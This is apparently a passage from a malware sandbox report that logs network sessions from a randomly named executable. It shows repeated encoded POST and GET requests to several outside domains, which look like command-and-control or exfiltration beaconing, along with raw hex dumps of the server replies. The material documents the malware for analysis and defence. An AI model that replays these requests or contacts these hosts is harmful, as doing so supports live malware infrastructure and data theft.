                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            21192.168.2.5637153.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:29.400132895 CEST832OUTPOST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 55 78 49 4b 69 4c 65 32 59 54 4d 4d 76 39 5a 31 51 6e 2f 72 35 46 76 57 54 79 6c 59 37 2b 32 47 32 61 6f 79 54 36 74 31 44 36 53 5a 2b 66 31 6c 61 68 62 79 6f 6b 2b 43 6c 30 41 47 51 63 31 2f 6a 33 62 46 45 78 55 59 6b 61 75 4f 78 6d 73 56 6e 47 66 48 54 55 74 57 62 69 75 6d 64 44 75 55 53 46 62 75 74 58 39 32 76 65 62 74 7a 61 30 58 49 4d 6d 4f 4e 79 74 34 57 69 78 67 67 4d 51 36 46 55 4c 4f 76 71 34 4f 53 6e 33 46 31 6c 66 6d 55 49 63 44 35 41 42 38 37 2b 42 36 30 44 6a 76 64 62 4f 35 56 58 52 2f 75 77 72 6d 50 34 70 7a 2f 4e 54 75 2f 76 4f 59 73 46 56 33 5a 6e 30 48 61 66 4f 51 43 50 73 3d
                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMv9Z1Qn/r5FvWTylY7+2G2aoyT6t1D6SZ+f1lahbyok+Cl0AGQc1/j3bFExUYkauOxmsVnGfHTUtWbiumdDuUSFbutX92vebtza0XIMmONyt4WixggMQ6FULOvq4OSn3F1lfmUIcD5AB87+B60DjvdbO5VXR/uwrmP4pz/NTu/vOYsFV3Zn0HafOQCPs=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            22192.168.2.5637163.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:31.947791100 CEST852OUTPOST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 55 78 49 4b 69 4c 65 32 59 54 4d 4d 75 63 70 31 63 6b 6e 72 2f 6c 76 52 50 69 6c 59 79 65 32 61 32 61 55 79 54 37 6f 6f 45 4a 36 5a 2b 2b 6c 6c 49 31 76 79 76 6b 2b 43 74 55 41 44 55 63 31 77 6a 33 48 4e 45 7a 77 59 6b 65 4f 4f 78 6d 38 56 6e 56 33 59 53 45 74 51 53 43 75 6b 54 6a 75 55 53 46 62 75 74 58 6f 5a 76 64 72 74 7a 71 6b 58 5a 64 6e 59 48 53 74 2f 52 69 78 67 6b 4d 51 2b 46 55 4c 6f 76 72 55 67 53 6b 44 46 31 67 37 6d 55 5a 63 63 33 41 42 6d 6b 4f 41 4d 79 69 4f 78 52 70 47 55 52 32 49 6b 7a 79 54 64 44 75 45 5a 6c 76 62 47 73 50 69 67 38 57 64 41 49 58 56 75 41 38 65 67 63 59 35 4e 65 79 4d 50 6d 62 41 67 44 54 2b 44 5a 5a 6c 5a 68 4b 6f 78
                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMucp1cknr/lvRPilYye2a2aUyT7ooEJ6Z++llI1vyvk+CtUADUc1wj3HNEzwYkeOOxm8VnV3YSEtQSCukTjuUSFbutXoZvdrtzqkXZdnYHSt/RixgkMQ+FULovrUgSkDF1g7mUZcc3ABmkOAMyiOxRpGUR2IkzyTdDuEZlvbGsPig8WdAIXVuA8egcY5NeyMPmbAgDT+DZZlZhKox


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            23192.168.2.5637173.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:34.490447998 CEST1869OUTPOST /e55r/ HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tracy.club
                                                                                                                                                                            Referer: http://www.tracy.club/e55r/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 55 78 49 4b 69 4c 65 32 59 54 4d 4d 75 63 70 31 63 6b 6e 72 2f 6c 76 52 50 69 6c 59 79 65 32 61 32 61 55 79 54 37 6f 6f 45 50 69 5a 2b 4d 39 6c 61 43 7a 79 75 6b 2b 43 6a 30 41 43 55 63 31 58 6a 33 50 42 45 7a 4d 69 6b 63 32 4f 77 41 77 56 32 55 33 59 63 45 74 51 4e 53 75 6c 64 44 75 46 53 46 4c 71 74 58 34 5a 76 64 72 74 7a 73 49 58 4a 38 6e 59 42 53 74 34 57 69 78 73 67 4d 51 47 46 55 53 54 76 72 51 65 53 33 62 46 32 41 4c 6d 53 72 45 63 2f 41 42 34 6c 4f 41 45 79 69 43 51 52 74 65 75 52 32 38 4b 7a 78 44 64 42 6f 4a 36 30 66 72 5a 36 59 47 34 32 78 42 48 51 67 78 34 4a 66 62 55 58 49 63 6a 43 47 59 6e 6f 72 6c 6e 42 58 2b 48 4b 63 39 73 72 73 52 45 55 4d 45 4a 54 54 38 63 2f 59 41 65 6c 56 6f 4d 74 64 37 44 56 47 39 35 70 65 32 67 52 79 6d 55 5a 76 64 35 43 51 43 79 53 75 55 4e 69 30 6d 4e 62 49 32 49 6a 4f 49 65 51 53 70 78 64 52 38 6a 32 7a 72 6d 2b 47 76 74 46 30 66 4b 50 79 6c 63 79 48 76 77 78 38 36 49 33 6a 49 2f 49 79 31 6f 41 6d 5a 59 4e 44 2b 75 48 48 5a 61 6f 31 59 55 4c 72 66 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMucp1cknr/lvRPilYye2a2aUyT7ooEPiZ+M9laCzyuk+Cj0ACUc1Xj3PBEzMikc2OwAwV2U3YcEtQNSuldDuFSFLqtX4ZvdrtzsIXJ8nYBSt4WixsgMQGFUSTvrQeS3bF2ALmSrEc/AB4lOAEyiCQRteuR28KzxDdBoJ60frZ6YG42xBHQgx4JfbUXIcjCGYnorlnBX+HKc9srsREUMEJTT8c/YAelVoMtd7DVG95pe2gRymUZvd5CQCySuUNi0mNbI2IjOIeQSpxdR8j2zrm+GvtF0fKPylcyHvwx86I3jI/Iy1oAmZYND+uHHZao1YULrf8SNGfq5Hjmh+wfqEv0pYtXjoVsmsBm4AQr3QF7z8DmRM6Jle5kz7V9ENuzVeQCbKiFDPtglXbcT4H0zAsBw9ZDicIqN5qUJnxpSxd7Wjuf7TEjsYFh8TVkZVJEhMINNB71oB9tN9Jbd3MuCHGpXzC3Jh9ia6VY9CCXokdhorcMmPM5Fna0jWcLvmtvfHDnl7jDPHs/l4UWlU2R7YgDXjlr1zXrt6Kfe/atbpJJClScSX+GMqlbQb/aVZEiQRlyU/iGT9WlwBuCKAf1i2+P5RwMtr9cJFswjVGlQ7KcDxpTPnjOK/ZsdAJ+QEz4DcJn9XFfZwUW0vtrwqX3l2F7YTLAtE/OTQX0CIM5Nt9CUttknTBEaUhixThWPpXUsm2heS317fu4WtaAmX3W37uuKqcNR5ii5BVCEsAg0HjGhzCVUasAIDFi270oWTK/2HbA8biYWokmsz++D2mMrT/DhYDq7im+/Hi0L9fvIQUhgw0UuIudUjJxsXqNnW8xYXiKYdJTJP+TZ/V8m4dcQhdhAtIJhM51Z/UBd16QcTx3+8/1AOmp5E83/pHTaSwAvO7v0dtfcDJNcjlzfvs7+FiLCMwmJCLFpVOP2cdx0c0OGeSOBlsyIk7Qt/NZXW0sByFi5PjgbIj7ghVNqbODF6lLrxuG2EES/8orvoNx [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            24192.168.2.5637183.33.130.190805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:37.032845974 CEST582OUTGET /e55r/?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg== HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:31:37.480252981 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                            Server: openresty
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 269
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 52 47 44 3d 72 38 65 48 77 6e 4d 70 62 32 64 78 4b 26 41 68 3d 5a 7a 67 71 68 38 4c 73 61 32 6b 4f 6d 4f 4e 4f 65 44 2f 2b 77 42 33 51 50 78 51 4b 69 4c 4f 36 37 70 78 53 43 37 68 50 4d 70 4f 47 31 5a 31 56 66 68 58 57 71 31 2f 65 36 6c 52 79 52 63 78 6c 68 48 33 56 42 68 31 6b 69 76 4c 43 34 45 6f 55 34 48 72 6d 51 6e 45 51 56 48 69 4e 54 69 4b 6f 48 32 72 78 33 58 49 71 76 73 72 72 79 38 67 7a 44 37 2f 62 42 44 38 6d 52 6a 4e 77 68 65 42 78 59 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg=="}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            25192.168.2.56371985.159.66.93805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:42.600414038 CEST862OUTPOST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 53 49 54 52 6f 62 76 71 56 63 58 44 33 57 67 34 31 6a 39 55 79 6b 53 34 53 47 77 47 58 36 70 52 58 2f 43 47 4e 73 78 4a 69 33 64 52 33 36 6c 74 33 6a 61 43 78 38 65 4f 33 59 77 42 74 43 46 46 42 34 78 38 6b 75 71 71 66 49 34 48 38 4e 76 51 52 67 33 77 50 52 63 72 4a 7a 5a 37 71 67 65 34 74 38 73 52 44 6d 41 68 48 31 6e 51 37 61 7a 61 4a 32 4a 31 47 36 2b 39 66 5a 78 2b 5a 57 51 33 69 72 6b 39 63 6b 66 6f 2b 71 7a 36 5a 70 32 63 57 76 6f 35 32 72 66 48 74 71 67 71 5a 52 74 59 2b 70 68 5a 33 64 31 77 65 2b 33 37 37 6c 57 57 2f 44 4d 41 51 76 38 56 5a 76 66 2f 63 37 6c 75 46 4f 4d 68 68 49 3d
                                                                                                                                                                            Data Ascii: Ah=9SITRobvqVcXD3Wg41j9UykS4SGwGX6pRX/CGNsxJi3dR36lt3jaCx8eO3YwBtCFFB4x8kuqqfI4H8NvQRg3wPRcrJzZ7qge4t8sRDmAhH1nQ7azaJ2J1G6+9fZx+ZWQ3irk9ckfo+qz6Zp2cWvo52rfHtqgqZRtY+phZ3d1we+377lWW/DMAQv8VZvf/c7luFOMhhI=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            26192.168.2.56372085.159.66.93805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:45.148454905 CEST882OUTPOST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 53 49 54 52 6f 62 76 71 56 63 58 41 57 6d 67 2b 57 4c 39 63 79 6b 64 68 53 47 77 4d 33 36 58 52 58 44 43 47 4a 30 68 4f 51 54 64 51 58 71 6c 69 57 6a 61 46 78 38 65 57 48 59 35 63 39 43 65 46 42 6b 35 38 68 4f 71 71 62 67 34 48 34 4a 76 51 6d 30 30 69 50 52 65 6b 70 7a 48 6c 61 67 65 34 74 38 73 52 44 7a 74 68 44 5a 6e 58 49 53 7a 62 73 43 49 34 6d 36 39 71 76 5a 78 6f 5a 58 58 33 69 71 44 39 63 55 6c 6f 38 69 7a 36 64 68 32 64 44 44 70 73 47 72 64 5a 74 72 63 75 72 49 46 57 4e 46 2f 51 6b 31 77 6e 2f 58 4b 2b 4e 49 38 4d 64 4c 6b 54 77 44 45 46 4b 6e 6f 75 73 61 4d 30 6d 65 38 2f 32 65 33 50 39 6e 2b 72 74 76 35 67 51 73 4c 67 4a 7a 68 2b 59 47 32
                                                                                                                                                                            Data Ascii: Ah=9SITRobvqVcXAWmg+WL9cykdhSGwM36XRXDCGJ0hOQTdQXqliWjaFx8eWHY5c9CeFBk58hOqqbg4H4JvQm00iPRekpzHlage4t8sRDzthDZnXISzbsCI4m69qvZxoZXX3iqD9cUlo8iz6dh2dDDpsGrdZtrcurIFWNF/Qk1wn/XK+NI8MdLkTwDEFKnousaM0me8/2e3P9n+rtv5gQsLgJzh+YG2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            27192.168.2.56372185.159.66.93805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:47.694169044 CEST1899OUTPOST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 53 49 54 52 6f 62 76 71 56 63 58 41 57 6d 67 2b 57 4c 39 63 79 6b 64 68 53 47 77 4d 33 36 58 52 58 44 43 47 4a 30 68 4f 51 62 64 52 6b 53 6c 6a 31 4c 61 45 78 38 65 49 33 59 38 63 39 44 47 46 42 73 39 38 68 4b 51 71 64 6b 34 47 62 42 76 57 54 59 30 34 66 52 65 38 70 7a 61 37 71 68 44 34 74 73 6f 52 44 6a 74 68 44 5a 6e 58 4f 32 7a 53 5a 32 49 2b 6d 36 2b 39 66 5a 74 2b 5a 58 7a 33 68 61 35 39 64 67 50 76 4e 43 7a 37 39 78 32 62 31 58 70 75 6d 72 62 63 74 72 45 75 72 30 61 57 4e 5a 7a 51 6b 77 66 6e 38 48 4b 39 4b 68 31 4a 66 2f 61 48 54 62 59 4f 72 6a 43 77 37 65 56 37 47 69 64 79 47 65 78 50 64 75 55 71 34 50 65 6f 7a 56 66 79 6f 6e 4f 35 2b 33 41 2b 68 6f 71 51 4f 56 56 66 35 76 71 42 58 51 30 2f 37 37 62 47 37 75 59 4f 45 49 43 63 65 41 63 66 79 5a 35 30 71 56 74 50 58 48 75 71 4e 70 5a 64 51 7a 4f 66 69 74 2f 52 42 70 41 76 73 44 45 65 61 30 6b 64 48 68 6e 39 63 55 68 57 6b 61 4c 78 59 51 68 31 79 63 46 67 54 71 4c 58 57 47 4c 33 62 6d 46 56 2b 72 45 2b 7a 75 43 67 42 41 35 50 4a 2b [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=9SITRobvqVcXAWmg+WL9cykdhSGwM36XRXDCGJ0hOQbdRkSlj1LaEx8eI3Y8c9DGFBs98hKQqdk4GbBvWTY04fRe8pza7qhD4tsoRDjthDZnXO2zSZ2I+m6+9fZt+ZXz3ha59dgPvNCz79x2b1XpumrbctrEur0aWNZzQkwfn8HK9Kh1Jf/aHTbYOrjCw7eV7GidyGexPduUq4PeozVfyonO5+3A+hoqQOVVf5vqBXQ0/77bG7uYOEICceAcfyZ50qVtPXHuqNpZdQzOfit/RBpAvsDEea0kdHhn9cUhWkaLxYQh1ycFgTqLXWGL3bmFV+rE+zuCgBA5PJ+4/Sn/vhg8Fk91825bAY9wmorxrNZ/6bVrh0eI4bSgOwkOoXU0+8ylgfNA0Mpx9r0igfKzWcNVM1F+d6+mlfFUR/Cp0eeJq+KjEArcHk8q/iyxEq7IvQwcH9Qq7pic4c77iWwpgDvzG3i+yosmbEWRLUGFSDMTrXWyrfEyXQ0huZQBaJQi3PmE9BvZSFE+7sKNS02XdvDvY99OORsAkYHvoa0+dh+K2QeTGtMyeloRY5yZ8xHkum9R4wgQ4amDWaktQFCkqU7u3xXe2oBQK052cU4ggRtoye98hTh8IMQto3lH1AA4CVvp/ESTcPeY8zNEg4tYm7mebKCHakprTpS3f3xlwrG2uS+qMEl9UFcZi6A68e4wsccFluOVbHIFhOr0cVbkhFJFRz8OGQM3uiGaZ5AiyaeauJGoo+C9cqd/6o+lYyMOJf69ajkrOkp+AJB+JQhTaJt29+yT8B+GhN3m7LWENRWUvgccjGKdQLiZUUz+3AH1I9FZuPc8swWKjClBw4yU8eAh017zuOVtstm4qy3eNZyhrVMq/22zxK7jjlJvAxAsMYjvz3jPSV2p8UP3A/0T0BXJ7wQiW7lkxwhDPhgSFWdBzJ53wltDoiWunU5Z/kmiDkn0WUMeO/9G6clvF5Hi8kxiydCDfAEcx7+WIXdWtPTOIFH+K [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            28192.168.2.56372285.159.66.93805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:50.235347033 CEST592OUTGET /zmf1/?Ah=wQgzSdKeo0kEfEOz4RbofRMggT2xbAKfRVneK/8vOxPjchK4g13SHjFeWQ1KQd6iPh0o+E7CiOJrL4NuVjgo/c0di4XWtbQHuM4tDDSwmQdaf4WdVMWT5U3p3+pOk6ad0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:31:50.929873943 CEST225INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:50 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                                            X-Rate-Limit-Reset: 2024-09-27T15:31:55.8118827Z


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            29192.168.2.563723160.251.148.20805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:56.465771914 CEST841OUTPOST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
